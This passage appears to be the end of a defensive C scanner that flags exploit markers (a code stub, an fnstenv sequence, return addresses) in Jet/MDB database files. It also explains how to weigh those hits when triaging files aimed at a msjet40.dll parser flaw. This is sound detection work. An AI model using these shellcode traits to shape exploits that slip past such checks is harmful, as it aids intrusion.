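    memset(b, 0x43, SAMPLE_SIZE);
    memcpy(b, JET_MAGIC, sizeof JET_MAGIC - 1);
    return classify_mdb(b, SAMPLE_SIZE);
}

int main(void) {
    unsigned char buf[SAMPLE_SIZE];
    struct hit hits[MAX_HITS];
    size_t len = build_sample(buf, sizeof buf);
    size_t n = scan_mdb(buf, len, hits, MAX_HITS);
    printf("Jet signature: %s, class %d, %zu marker(s)\n",
           has_jet_magic(buf, len) ? "yes" : "no", classify_mdb(buf, len), n);
    for (size_t i = 0; i < n && i < MAX_HITS; i++)
        printf("  0x%06zx  %s\n", hits[i].offset, hits[i].name);
    return 0;
}
```

To check a real file, read it into memory and pass the buffer to classify_mdb or scan_mdb. Weight the hits: the five-byte stub and the six-byte fnstenv sequence are specific to code, whereas a lone four-byte address can occur by chance in any binary data, so an address hit on its own is weak evidence. The signature check only tells you the file claims to be a Jet database; it does not validate the structure the vulnerable parser trips over, so this is a triage aid, not a substitute for patching msjet40.dll.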